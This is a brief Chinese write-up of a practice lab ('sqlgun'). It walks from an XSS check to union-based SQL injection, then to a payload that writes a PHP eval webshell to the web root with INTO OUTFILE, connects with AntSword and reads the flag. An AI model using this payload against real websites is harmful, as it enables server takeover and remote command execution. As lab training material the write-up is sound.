sqlgun靶场练习

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POSTcmd); ?>", 3 into outfile '/var/www/html/1.php'#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag

相关推荐
数据知道13 小时前
网络安全实战:子域名接管实战——从 CNAME 配置错误到完全控制
网络·安全·web安全·网络安全
小新讲网安14 小时前
云安全攻防实战:AWS与阿里云渗透测试全流程指南
安全·web安全·网络安全·阿里云·自动化·云计算·aws
吴声子夜歌14 小时前
网络安全——身份认证
安全·web安全·身份认证
Zkaisen16 小时前
RN与Metro
web安全
Aision_16 小时前
代码安全学习手记(二):SCA 软件成分分析原理与 OWASP Dependency-Check 集成实战
运维·人工智能·学习·安全·web安全·网络安全
juesdo19 小时前
vulnos OS-00118靶场通关
linux·web安全·网络安全·docker
数据知道19 小时前
网络安全实战:渗透测试全流程 SOP——从授权到报告交付
服务器·网络·安全·web安全·网络安全
吴声子夜歌19 小时前
网络安全——网络地址转换及其应用
网络·web安全·nat
猫咪宝妖20 小时前
【信息安全工程师】第一天考前准备
网络·安全·web安全
吴声子夜歌20 小时前
网络安全——网络安全防护技术(二)
网络·web安全